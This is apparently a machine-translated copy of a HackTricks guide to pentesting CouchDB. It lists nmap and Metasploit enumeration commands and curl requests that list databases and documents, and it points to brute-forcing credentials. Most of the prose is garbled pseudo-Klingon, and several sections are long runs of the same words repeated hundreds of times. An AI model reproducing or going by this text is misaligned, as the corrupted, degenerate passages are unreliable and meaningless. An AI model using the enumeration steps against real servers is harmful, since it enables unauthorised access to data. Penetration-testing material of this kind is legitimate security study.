64 KiB
5984,6984 - Pentesting CouchDB
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
CouchDB is a versatile and powerful document-oriented database that organizes data using a key-value map structure within each document. Fields within the document can be represented as key/value pairs, lists, or maps, providing flexibility in data storage and retrieval.
Every document stored in CouchDB is assigned a unique identifier (_id) at the document level. Additionally, each modification made and saved to the database is assigned a revision number (_rev). This revision number allows for efficient tracking and management of changes, facilitating easy retrieval and synchronization of data within the database.
Default port: 5984(http), 6984(https)
PORT STATE SERVICE REASON
5984/tcp open unknown syn-ack
Qapvutlh
nmap -sV --script couchdb-databases,couchdb-stats -p <PORT> <IP>
msf> use auxiliary/scanner/couchdb/couchdb_enum
Manual Enumeration
Banner
curl http://IP:5984/
Translation:
DaH jImej laH GET request CouchDB instance. reply vItlhutlh:
The rest of the content should remain in English.
{"couchdb":"Welcome","version":"0.10.1"}
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}
{% hint style="info" %} ghobe' 'ej couchdb root of accessing 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej 'oH 'ej '
curl -X GET http://IP:5984/_all_dbs
ghItlh 'e' 401 unauthorised responds vaj request 'ej, valid credentials chu' database ghItlh access lIj.
curl -X GET http://user:password@IP:5984/_all_dbs
ghItlh valid Credentials ghaH tlhIngan bruteforce the service](../generic-methodologies-and-resources/brute-force.md#couchdb).
qaStaHvIS couchdb response ghaH example tlhIngan enough privileges ghaH list databases (It's just a list of dbs):
["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]
Database Info
You can obtain some database info (like number of files and sizes) accessing the database name:
Database Info
jIyajbe'chugh, jatlhpu'wI'pu' (number of files and sizes) database name laH.
curl http://IP:5984/<database>
curl http://localhost:5984/simpsons
#Example response:
{"db_name":"simpsons","update_seq":"7-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQmPoiQFIJlkD1bHjE-dA0hdPFgdAz51CSB19WB1jHjU5bEASYYGIAVUOp8YtQsgavfjtx-i9gBE7X1i1D6AqAX5KwsA2vVvNQ","sizes":{"file":62767,"external":1320,"active":2466},"purge_seq":0,"other":{"data_size":1320},"doc_del_count":0,"doc_count":7,"disk_size":62767,"disk_format_version":6,"data_size":2466,"compact_running":false,"instance_start_time":"0"}
Qaw'wI' QIn
Qaw'wI' QIn vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh vItlhutlhlaHbe'chugh yIlo'laHbe'chugh
curl -X GET http://IP:5984/{dbname}/_all_docs
curl http://localhost:5984/simpsons/_all_docs
#Example response:
{"total_rows":7,"offset":0,"rows":[
{"id":"f0042ac3dc4951b51f056467a1000dd9","key":"f0042ac3dc4951b51f056467a1000dd9","value":{"rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329"}},
{"id":"f53679a526a868d44172c83a61000d86","key":"f53679a526a868d44172c83a61000d86","value":{"rev":"1-7b8ec9e1c3e29b2a826e3d14ea122f6e"}},
{"id":"f53679a526a868d44172c83a6100183d","key":"f53679a526a868d44172c83a6100183d","value":{"rev":"1-e522ebc6aca87013a89dd4b37b762bd3"}},
{"id":"f53679a526a868d44172c83a61002980","key":"f53679a526a868d44172c83a61002980","value":{"rev":"1-3bec18e3b8b2c41797ea9d61a01c7cdc"}},
{"id":"f53679a526a868d44172c83a61003068","key":"f53679a526a868d44172c83a61003068","value":{"rev":"1-3d2f7da6bd52442e4598f25cc2e84540"}},
{"id":"f53679a526a868d44172c83a61003a2a","key":"f53679a526a868d44172c83a61003a2a","value":{"rev":"1-4446bfc0826ed3d81c9115e450844fb4"}},
{"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}}
]}
QaD QIn
QaD QIn vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh 